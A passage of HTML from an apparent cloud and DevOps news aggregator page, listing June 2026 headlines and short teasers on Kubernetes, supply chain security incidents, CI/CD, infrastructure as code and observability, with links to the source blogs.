          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-breaking-free-of-a-single-datacenter-practical-geo-distributed-ai-operations-with-the-k0smos-platforms"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Breaking the single datacenter assumption Modern AI architectures are built on the assumption of centralized, homogeneous data centers. In reality, infrastructure is messy. For most organizations, com</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/08/breaking-free-of-a-single-datacenter-practical-geo-distributed-ai-operations-with-the-k0smos-platforms/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-amazon-ecs-with-aws-fargate-now-supports-32vcpu-compute-configurations" class="group relative scroll-mt-24">
        <a href="#h3-amazon-ecs-with-aws-fargate-now-supports-32vcpu-compute-configurations" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon ECS with AWS Fargate now supports 32vCPU compute configurations
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-ecs-with-aws-fargate-now-supports-32vcpu-compute-configurations"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon Elastic Container Service (Amazon ECS) with AWS Fargate now supports 32vCPU compute configurations, enabling customers to run more demanding applications with greater flexibility and performanc</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-ecs-fargate-32vcpu"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-identity-and-access-management-whitepaper" class="group relative scroll-mt-24">
        <a href="#h3-identity-and-access-management-whitepaper" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Identity and Access Management Whitepaper
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-identity-and-access-management-whitepaper"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>As cloud native architectures become more distributed, dynamic, and automated, identity increasingly becomes the new security perimeter. Traditional approaches to authentication and authorization stru</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/04/identity-and-access-management-whitepaper/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-hardened-images-explained-fewer-cves-smaller-attack-surface" class="group relative scroll-mt-24">
        <a href="#h3-hardened-images-explained-fewer-cves-smaller-attack-surface" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Hardened Images Explained: Fewer CVEs, Smaller Attack Surface
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-hardened-images-explained-fewer-cves-smaller-attack-surface"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>When security teams scan their container environments for the first time, they often discover hundreds of known vulnerabilities, and almost none of them trace back to application code. The overwhelmin</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Docker Blog</strong></p>
<p><a href="https://www.docker.com/blog/what-are-hardened-images/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-yugandhar-suthari" class="group relative scroll-mt-24">
        <a href="#h3-yugandhar-suthari" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Yugandhar Suthari
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-yugandhar-suthari"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>CNCF Kyverno maintainer, KubeCon Europe 2026 Program Committee member, KyvernoCon 2025–2026 program comittee and speaker, Golden Kubestronaut</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 KubeCon Updates</strong></p>
<p><a href="https://events.linuxfoundation.org/2026/06/03/yugandhar-suthari/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-fragnesia-and-friends-when-page-cache-vulnerabilities-keep-coming-back" class="group relative scroll-mt-24">
        <a href="#h3-fragnesia-and-friends-when-page-cache-vulnerabilities-keep-coming-back" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Fragnesia and friends: When page cache vulnerabilities keep coming back
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-fragnesia-and-friends-when-page-cache-vulnerabilities-keep-coming-back"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A couple of weeks ago, I wrote about Copy-Fail (CVE-2026-31431) and how Red Hat OpenShift’s defense-in-depth approach prevented container escape despite a vulnerable kernel. I spent time actively tryi</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 OpenShift Blog</strong></p>
<p><a href="https://www.redhat.com/en/blog/fragnesia-and-friends-when-page-cache-vulnerabilities-keep-coming-back"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-cicd" class="group relative scroll-mt-24">
        <a href="#h2-cicd" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🔄 CI/CD
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-cicd"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-shai-hulud-miasma-inside-the-compromise-of-red-hat-packages" class="group relative scroll-mt-24">
        <a href="#h3-shai-hulud-miasma-inside-the-compromise-of-red-hat-packages" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Shai-Hulud Miasma: Inside the Compromise of Red Hat Packages
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-shai-hulud-miasma-inside-the-compromise-of-red-hat-packages"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>An in-depth look at the Miasma supply chain attack that compromised Red Hat npm packages. Learn how the malware spread, stole credentials, abused trusted publishing, and the steps teams can take to mi</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Harness Blog</strong></p>
<p><a href="https://www.harness.io/blog/shai-hulud-miasma-inside-the-compromise-of-red-hats-packages"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-universe-is-back-all-together-now-in-the-agentic-era" class="group relative scroll-mt-24">
        <a href="#h3-github-universe-is-back-all-together-now-in-the-agentic-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub Universe is back: All together now, in the agentic era
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-universe-is-back-all-together-now-in-the-agentic-era"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>GitHub Universe is back: returning to the historic Fort Mason Center in San Francisco on October 28–29, 2026. The post GitHub Universe is back: All together now, in the agentic era appeared first on T</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/company-news/github-universe-is-back-all-together-now-in-the-agentic-era/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-securing-cicd-for-an-open-source-project-controlling-who-runs-what" class="group relative scroll-mt-24">
        <a href="#h3-securing-cicd-for-an-open-source-project-controlling-who-runs-what" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Securing CI/CD for an open source project: Controlling who runs what
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-securing-cicd-for-an-open-source-project-controlling-who-runs-what"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Part one The last twelve months have been rough on the open source supply chain. Axios was compromised on npm and shipped a remote access trojan inside otherwise normal-looking releases. LiteLLM’s PyP</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 CNCF Blog</strong></p>
<p><a href="https://www.cncf.io/blog/2026/06/04/securing-ci-cd-for-an-open-source-project-controlling-who-runs-what/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-github-copilot-app-the-agent-native-desktop-experience" class="group relative scroll-mt-24">
        <a href="#h3-github-copilot-app-the-agent-native-desktop-experience" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 GitHub Copilot app: The agent-native desktop experience
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-github-copilot-app-the-agent-native-desktop-experience"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>At Microsoft Build 2026, GitHub introduced new tools, updates, and surfaces so agents can work the way you already work. The post GitHub Copilot app: The agent-native desktop experience appeared first</p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 GitHub Blog</strong></p>
<p><a href="https://github.blog/news-insights/product-news/github-copilot-app-the-agent-native-desktop-experience/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-iac" class="group relative scroll-mt-24">
        <a href="#h2-iac" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          🏗️ IaC
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-iac"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-amazon-bedrock-agentcore-runtime-introduces-interactive-shells-for-terminal-access-into-agent-sessions" class="group relative scroll-mt-24">
        <a href="#h3-amazon-bedrock-agentcore-runtime-introduces-interactive-shells-for-terminal-access-into-agent-sessions" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Amazon Bedrock AgentCore Runtime introduces interactive shells for terminal access into agent sessions
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-amazon-bedrock-agentcore-runtime-introduces-interactive-shells-for-terminal-access-into-agent-sessions"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Amazon Bedrock AgentCore Runtime now supports interactive shells through a new InvokeAgentRuntimeCommandShell API, opening a persistent, PTY-backed terminal directly into a running agent session over </p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 CloudFormation Updates</strong></p>
<p><a href="https://aws.amazon.com/about-aws/whats-new/2026/06/amazon-bedrock-agentcore-runtime/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-trigger-deployments-on-git-tags" class="group relative scroll-mt-24">
        <a href="#h3-trigger-deployments-on-git-tags" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Trigger Deployments on Git Tags
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-trigger-deployments-on-git-tags"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A git tag is how many teams mark a release as ready. Pulumi Deployments can now act on that signal directly: configure a tag-based trigger, push a version tag like v1.2.0, and Pulumi automatically run</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/trigger-deployments-on-git-tags/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-use-your-mac-for-ai-agents-self-host-gemma-4-12-b-with-pulumi-and-tailscale" class="group relative scroll-mt-24">
        <a href="#h3-use-your-mac-for-ai-agents-self-host-gemma-4-12-b-with-pulumi-and-tailscale" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Use Your Mac for AI Agents: Self-Host Gemma 4 12 B with Pulumi and Tailscale
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-use-your-mac-for-ai-agents-self-host-gemma-4-12-b-with-pulumi-and-tailscale"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>If you run AI tools and agents, you’ve probably accepted three tradeoffs: your data leaves your network, you can’t work offline, and your bill scales with usage. Open-weight models now run well on con</p>
<p><strong>📅 Jun 4, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/self-host-gemma4-llama-cpp-k8s-tailscale-pulumi/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-why-choose-pulumi-over-terraform" class="group relative scroll-mt-24">
        <a href="#h3-why-choose-pulumi-over-terraform" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Why Choose Pulumi Over Terraform?
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-why-choose-pulumi-over-terraform"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Terraform is a proven infrastructure as code tool with a large provider and module ecosystem. Many teams choose Pulumi when they want to keep that infrastructure as code model, but write and maintain </p>
<p><strong>📅 Jun 2, 2026</strong> • <strong>📰 Pulumi Blog</strong></p>
<p><a href="https://www.pulumi.com/blog/why-choose-pulumi-over-terraform/"><strong>🔗 Read more</strong></a></p>
<hr>
<h2 id="h2-observability" class="group relative scroll-mt-24">
        <a href="#h2-observability" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📊 Observability
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h2-observability"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h2><h3 id="h3-from-cool-demo-to-production-ready-how-we-made-an-ai-travel-agent-trustworthy-with-new-relic" class="group relative scroll-mt-24">
        <a href="#h3-from-cool-demo-to-production-ready-how-we-made-an-ai-travel-agent-trustworthy-with-new-relic" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 From Cool Demo to Production-Ready: How We Made an AI Travel Agent Trustworthy with New Relic
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-from-cool-demo-to-production-ready-how-we-made-an-ai-travel-agent-trustworthy-with-new-relic"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>A walkthrough of taking an AI Travel Agent (WanderAI) from a demo to production, covering OpenTelemetry tracing, AI monitoring, SLOs, and prompt injection defense.</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/observability/ai-travel-agent-production-ready-new-relic"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-building-the-future-of-telemetry-in-the-open" class="group relative scroll-mt-24">
        <a href="#h3-building-the-future-of-telemetry-in-the-open" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Building the Future of Telemetry in the Open
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-building-the-future-of-telemetry-in-the-open"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>New Relic Experimental is our open-source incubator designed to bridge the gap between emerging tech and enterprise observability.</p>
<p><strong>📅 Jun 8, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/building-the-future-of-telemetry-in-the-open"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-errors-traces-logs-metrics-when-to-reach-for-what" class="group relative scroll-mt-24">
        <a href="#h3-errors-traces-logs-metrics-when-to-reach-for-what" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Errors, traces, logs, metrics: when to reach for what
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-errors-traces-logs-metrics-when-to-reach-for-what"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Errors, traces, logs, and metrics overlap enough that it&#39;s hard to know which to use. Here&#39;s when to reach for each signal, with a real debugging walkthrough.</p>
<p><strong>📅 Jun 5, 2026</strong> • <strong>📰 Sentry Blog</strong></p>
<p><a href="https://blog.sentry.io/errors-traces-logs-metrics-when-to-reach-for-what/"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-supercharge-sap-on-aws-intelligent-observability-for-the-hybrid-enterprise" class="group relative scroll-mt-24">
        <a href="#h3-supercharge-sap-on-aws-intelligent-observability-for-the-hybrid-enterprise" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 Supercharge SAP on AWS: Intelligent Observability for the hybrid enterprise
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-supercharge-sap-on-aws-intelligent-observability-for-the-hybrid-enterprise"
        >
          <svg class="h-4 w-4" fill="none" stroke="currentColor" viewBox="0 0 24 24">
            <path stroke-linecap="round" stroke-linejoin="round" stroke-width="2" 
              d="M13.828 10.172a4 4 0 00-5.656 0l-4 4a4 4 0 105.656 5.656l1.102-1.101m-.758-4.899a4 4 0 005.656 0l4-4a4 4 0 00-5.656-5.656l-1.1 1.1" />
            </svg>
          </button>
        </h3><p>Supercharge SAP on AWS transformation with New Relic&#39;s intelligent observability. Get full-stack visibility across hybrid and RISE with SAP environments.</p>
<p><strong>📅 Jun 3, 2026</strong> • <strong>📰 New Relic Blog</strong></p>
<p><a href="https://newrelic.com/blog/news/supercharge-sap-on-aws-intelligent-observability-for-the-hybrid-enterprise"><strong>🔗 Read more</strong></a></p>
<h3 id="h3-new-relic-and-microsoft-intelligent-observability-for-the-agentic-era" class="group relative scroll-mt-24">
        <a href="#h3-new-relic-and-microsoft-intelligent-observability-for-the-agentic-era" class="no-underline text-inherit hover:text-inherit focus:outline-none focus:ring-0 focus:ring-offset-0">
          📄 New Relic and Microsoft: Intelligent Observability for the Agentic Era
        </a>
        <button 
          class="copy-heading-link absolute -left-8 top-1/2 -translate-y-1/2 opacity-0 group-hover:opacity-100 transition-all duration-200 p-1.5 rounded-md hover:bg-muted/80 focus:outline-none focus:ring-2 focus:ring-ring focus:ring-offset-2 text-muted-foreground hover:text-foreground"
          aria-label="Copy link to section"
          data-heading-id="h3-new-relic-and-microsoft-intelligent-observability-for-the-agentic-era"
        >
